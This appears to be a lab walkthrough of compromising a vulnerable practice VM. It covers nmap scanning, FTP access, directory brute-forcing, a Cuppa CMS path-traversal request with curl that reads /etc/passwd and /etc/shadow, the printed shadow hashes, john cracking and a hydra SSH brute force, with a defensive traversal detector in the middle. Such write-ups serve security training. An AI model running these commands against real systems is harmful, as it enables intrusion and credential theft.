Information gathering: nmap
sudo nmap -sn 192.168.37.0/24
sudo nmap -sT --min-rate 1000 -p- 192.168.37.7 -oA nmapscan/ports
ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.37.7 -oA nmapscan/detail
sudo nmap -sU --top-ports 20 192.168.37.7 -oA nmapscan/udp
sudo nmap --script=vuln -p21,22,80,3306 192.168.37.7 -oA nmapscan/vuln
ftp > anonymous (username) : (password)
binary (switch to binary mode so downloaded files are not corrupted)
? (view the file directory)
ls
prompt (turn off interactive prompting)
mget *.txt (download all .txt files)
hash-identifier (tool for identifying which hash algorithm was used)
vim md5
Crack the MD5 with john: john md5
Crack it with an online MD5 lookup service: This is not a password
echo -n 'This is not a password' | md5sum (verify)
echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d (base64 decode)
Brute-forcing
gobuster
gobuster dir -u http://192.168.37.7/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
dirb, searching for specific file extensions
dirb http://192.168.37.3/ -X .zip,.txt -o report/dirbveryhart.txt
wfuzz fuzzing
sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.37.3/index.php?FUZZ=something
wpscan
sudo wpscan -e u --url http://192.168.37.3/wordpress
searchsploit cuppa cms
searchsploit cuppa
Accessible
The page accepts its parameter via POST
Submit the POST with curl
curl --help all | grep url (look up the exact option for URL-encoded POST data)
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.37.7/administrator/alerts/alertConfigField.php
The passwd file is printed successfully
View the shadow file
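From the defender's side, the request above is easy to spot if the `urlConfig` value is inspected after decoding. The following is an added example (not part of the original notes or of Cuppa CMS) that flags traversal sequences and sensitive file targets in request parameters; the request records are constructed samples, since plain access logs do not usually carry POST bodies.

```python
import re
from urllib.parse import unquote_plus, parse_qs

# Constructed sample requests: (method, path, query-or-body). The third one
# mirrors the traversal POST shown above; the fourth is double-encoded.
SAMPLE_REQUESTS = [
    ("GET", "/index.php", "page=home"),
    ("GET", "/administrator/alerts/alertConfigField.php", "urlConfig=alerts/config.php"),
    ("POST", "/administrator/alerts/alertConfigField.php",
     "urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"),
    ("POST", "/administrator/alerts/alertConfigField.php",
     "urlConfig=%252e%252e%252f%252e%252e%252fetc%252fshadow"),
]

# Targets worth alerting on even without a visible "../" (assumed list).
SENSITIVE_TARGETS = ("/etc/passwd", "/etc/shadow", "php://", "wp-config")

def normalize(value, rounds=3):
    """Percent-decode repeatedly (bounded) and unify slashes so encoded traversal shows up."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def inspect_request(method, path, params):
    """Return the findings for one request; an empty list means nothing suspicious."""
    findings = []
    for name, values in parse_qs(params, keep_blank_values=True).items():
        for raw in values:
            norm = normalize(raw)
            if re.search(r"(^|/)\.\.(/|$)", norm):
                findings.append(f"{method} {path}: traversal in parameter '{name}'")
            if any(t in norm.lower() for t in SENSITIVE_TARGETS):
                findings.append(f"{method} {path}: sensitive target in parameter '{name}'")
    return findings

def scan(requests):
    """Run inspect_request over every record and flatten the findings."""
    return [f for req in requests for f in inspect_request(*req)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```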
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
Save it and crack with john
john shadow
Alternatively, brute-force the SSH password directly
hydra -L user.list -P /usr/share/wordlists/rockyou.txt ssh://192.168.37.7 -t 4
user.list:
Naomi
Hector
Joseph
Albert
Gina
Rico